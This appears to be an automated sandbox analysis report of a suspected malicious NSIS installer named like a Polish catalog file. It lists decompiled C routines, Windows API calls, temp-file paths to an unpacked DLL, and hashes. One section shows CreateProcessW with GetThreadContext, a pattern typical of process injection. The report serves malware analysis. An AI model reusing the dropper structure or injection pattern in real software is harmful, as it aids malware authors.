                                                  						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
                                                  						lstrcatA(0x409c40,  *(_t85 - 0xc));
                                                  					}
                                                  					_push(0x200010);
                                                  					_push(0x409c40);
                                                  					E00405488();
                                                  					goto L29;
                                                  				}
                                                  				goto L33;
                                                  			}
















                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,rtrystwqtc,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                  • CompareFileTime.KERNEL32(-00000014,?,rtrystwqtc,rtrystwqtc,00000000,00000000,rtrystwqtc,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                    • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,egkwshqw Setup,NSIS Error), ref: 00405BD4
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041F64C,747DEA30), ref: 00404F0F
                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nss48B9.tmp$C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll$rtrystwqtc
                                                  • API String ID: 1941528284-1524841839
                                                  • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                  • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                  • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                  • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405375(CHAR* _a4) {
                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                  				int _t22;
                                                  				long _t23;
                                                  
                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                  				_v36.Owner = 0x40735c;
                                                  				_v36.Group = 0x40735c;
                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                  				_v36.Revision = 1;
                                                  				_v36.Control = 4;
                                                  				_v36.Dacl = 0x40734c;
                                                  				_v16.nLength = 0xc;
                                                  				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                  				if(_t22 != 0) {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  				_t23 = GetLastError();
                                                  				if(_t23 == 0xb7) {
                                                  					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                  						goto L1;
                                                  					}
                                                  					return GetLastError();
                                                  				}
                                                  				return _t23;
                                                  			}








                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                  • GetLastError.KERNEL32 ref: 004053CC
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                  • GetLastError.KERNEL32 ref: 004053EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                  • API String ID: 3449924974-1629030221
                                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 1001615E
                                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 10016181
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ContextCreateProcessThread
                                                  • String ID: D
                                                  • API String ID: 2843130473-2746444292
                                                  • Opcode ID: 8503608d335ae0c1c7c187de458b0b5e7d1eeca9331417821db36ef7658a064a
                                                  • Instruction ID: ca23d4e3055732342490b46184f12bf0358ba2633ee4662b3825b44e89c3ae73
                                                  • Opcode Fuzzy Hash: 8503608d335ae0c1c7c187de458b0b5e7d1eeca9331417821db36ef7658a064a
                                                  • Instruction Fuzzy Hash: 89A1D174E00209EFDB40DFA4CD81BAEBBB9EF08345F244469E915EB251D771EA81DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405EE9(intOrPtr _a4) {
                                                  				char _v292;
                                                  				int _t10;
                                                  				struct HINSTANCE__* _t14;
                                                  				void* _t16;
                                                  				void* _t21;
                                                  
                                                  				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                  				if(_t10 > 0x104) {
                                                  					_t10 = 0;
                                                  				}
                                                  				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                  					_t16 = 1;
                                                  				} else {
                                                  					_t16 = 0;
                                                  				}
                                                  				_t5 = _t16 + 0x409010; // 0x5c
                                                  				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                  				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                  				return _t14;
                                                  			}









                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                  • wsprintfA.USER32 ref: 00405F39
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10015004() {
                                                  
                                                  				goto 0x100157e1;
                                                  			}



                                                  0x10015004

                                                  APIs
                                                  • GetTempPathW.KERNELBASE(00000103,?), ref: 10015978
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100159A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CreateFilePathTemp
                                                  • String ID:
                                                  • API String ID: 1031868398-0
                                                  • Opcode ID: a247b2f1427a00d5c6ef4ae1e7c0fbfdf51d3505b67c05fe188a2625eb606fa0
                                                  • Instruction ID: 4f146de04ca3e81ba12eabfefae8d48ee7cc0c1e2ed152c94c4989443c7fdb84
                                                  • Opcode Fuzzy Hash: a247b2f1427a00d5c6ef4ae1e7c0fbfdf51d3505b67c05fe188a2625eb606fa0
                                                  • Instruction Fuzzy Hash: 5C715A35E50348EAEB60DBE4E856BEDB7B5EF48710F20441AF608EE2E0D7715A81DB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                  				signed int _t11;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t19;
                                                  				CHAR* _t20;
                                                  
                                                  				_t20 = _a4;
                                                  				_t19 = 0x64;
                                                  				while(1) {
                                                  					_t19 = _t19 - 1;
                                                  					_a4 = 0x61736e;
                                                  					_t11 = GetTickCount();
                                                  					_t16 = 0x1a;
                                                  					_a6 = _a6 + _t11 % _t16;
                                                  					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                  					if(_t14 != 0) {
                                                  						break;
                                                  					}
                                                  					if(_t19 != 0) {
                                                  						continue;
                                                  					}
                                                  					 *_t20 =  *_t20 & 0x00000000;
                                                  					return _t14;
                                                  				}
                                                  				return _t20;
                                                  			}









                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004058E0
                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-2861158128
                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 60%
                                                  			E00401F84(void* __ebx, void* __eflags) {
                                                  				struct HINSTANCE__* _t18;
                                                  				struct HINSTANCE__* _t26;
                                                  				void* _t27;
                                                  				struct HINSTANCE__* _t30;
                                                  				CHAR* _t32;
                                                  				intOrPtr* _t33;
                                                  				void* _t34;
                                                  
                                                  				_t27 = __ebx;
                                                  				asm("sbb eax, 0x42ecd8");
                                                  				 *(_t34 - 4) = 1;
                                                  				if(__eflags < 0) {
                                                  					_push(0xffffffe7);
                                                  					L15:
                                                  					E00401423();
                                                  					L16:
                                                  					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
                                                  					return 0;
                                                  				}
                                                  				_t32 = E00402A29(0xfffffff0);
                                                  				 *(_t34 + 8) = E00402A29(1);
                                                  				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                  					L3:
                                                  					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                  					_t30 = _t18;
                                                  					if(_t30 == _t27) {
                                                  						_push(0xfffffff6);
                                                  						goto L15;
                                                  					}
                                                  					L4:
                                                  					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                  					if(_t33 == _t27) {
                                                  						E00404EB3(0xfffffff7,  *(_t34 + 8));
                                                  					} else {
                                                  						 *(_t34 - 4) = _t27;
                                                  						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                  							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
                                                  						} else {
                                                  							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                  							if( *_t33() != 0) {
                                                  								 *(_t34 - 4) = 1;
                                                  							}
                                                  						}
                                                  					}
                                                  					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
                                                  						FreeLibrary(_t30);
                                                  					}
                                                  					goto L16;
                                                  				}
                                                  				_t26 = GetModuleHandleA(_t32); // executed
                                                  				_t30 = _t26;
                                                  				if(_t30 != __ebx) {
                                                  					goto L4;
                                                  				}
                                                  				goto L3;
                                                  			}











                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041F64C,747DEA30), ref: 00404F0F
                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                  • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                  • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                  • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E004015B3(char __ebx, void* __eflags) {
                                                  				void* _t13;
                                                  				int _t19;
                                                  				char _t21;
                                                  				void* _t22;
                                                  				char _t23;
                                                  				signed char _t24;
                                                  				char _t26;
                                                  				CHAR* _t28;
                                                  				char* _t32;
                                                  				void* _t33;
                                                  
                                                  				_t26 = __ebx;
                                                  				_t28 = E00402A29(0xfffffff0);
                                                  				_t13 = E0040574E(_t28);
                                                  				_t30 = _t13;
                                                  				if(_t13 != __ebx) {
                                                  					do {
                                                  						_t32 = E004056E5(_t30, 0x5c);
                                                  						_t21 =  *_t32;
                                                  						 *_t32 = _t26;
                                                  						 *((char*)(_t33 + 0xb)) = _t21;
                                                  						if(_t21 != _t26) {
                                                  							L5:
                                                  							_t22 = E004053F2(_t28);
                                                  						} else {
                                                  							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                  							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
                                                  								goto L5;
                                                  							} else {
                                                  								_t22 = E00405375(_t28); // executed
                                                  							}
                                                  						}
                                                  						if(_t22 != _t26) {
                                                  							if(_t22 != 0xb7) {
                                                  								L9:
                                                  								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                  							} else {
                                                  								_t24 = GetFileAttributesA(_t28); // executed
                                                  								if((_t24 & 0x00000010) == 0) {
                                                  									goto L9;
                                                  								}
                                                  							}
                                                  						}
                                                  						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                  						 *_t32 = _t23;
                                                  						_t30 = _t32 + 1;
                                                  					} while (_t23 != _t26);
                                                  				}
                                                  				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                  					_push(0xfffffff5);
                                                  					E00401423();
                                                  				} else {
                                                  					E00401423(0xffffffe6);
                                                  					E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
                                                  					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                  					if(_t19 == 0) {
                                                  						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                  					}
                                                  				}
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
                                                  				return 0;
                                                  			}














                                                  APIs
                                                    • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                    • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                    • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1892508949-1104044542
                                                  • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                  • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                  • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                  • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
                                                  				intOrPtr* _t6;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  				signed int _t11;
                                                  				void* _t12;
                                                  				intOrPtr _t15;
                                                  				signed int _t16;
                                                  				signed int _t17;
                                                  				void* _t18;
                                                  
                                                  				_t17 = _a4;
                                                  				while(_t17 >= 0) {
                                                  					_t15 =  *0x42ec50; // 0x79f41c
                                                  					_t6 = _t17 * 0x1c + _t15;
                                                  					if( *_t6 == 1) {
                                                  						break;
                                                  					}
                                                  					_push(_t6); // executed
                                                  					_t8 = E00401434(); // executed
                                                  					if(_t8 == 0x7fffffff) {
                                                  						return 0x7fffffff;
                                                  					}
                                                  					_t10 = E0040136D(_t8);
                                                  					if(_t10 != 0) {
                                                  						_t11 = _t10 - 1;
                                                  						_t16 = _t17;
                                                  						_t17 = _t11;
                                                  						_t12 = _t11 - _t16;
                                                  					} else {
                                                  						_t12 = _t10 + 1;
                                                  						_t17 = _t17 + 1;
                                                  					}
                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                  						 *0x42e40c =  *0x42e40c + _t12;
                                                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}













                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                  • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                  • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                  • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405F57(signed int _a4) {
                                                  				struct HINSTANCE__* _t5;
                                                  				signed int _t10;
                                                  
                                                  				_t10 = _a4 << 3;
                                                  				_t8 =  *(_t10 + 0x409208);
                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
                                                  				if(_t5 != 0) {
                                                  					L2:
                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
                                                  				}
                                                  				_t5 = E00405EE9(_t8); // executed
                                                  				if(_t5 == 0) {
                                                  					return 0;
                                                  				}
                                                  				goto L2;
                                                  			}






                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                    • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                    • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                    • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E0040589E(CHAR* _a4, long _a8, long _a12) {
                                                  				signed int _t5;
                                                  				void* _t6;
                                                  
                                                  				_t5 = GetFileAttributesA(_a4); // executed
                                                  				asm("sbb ecx, ecx");
                                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                  				return _t6;
                                                  			}






                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 004058A2
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
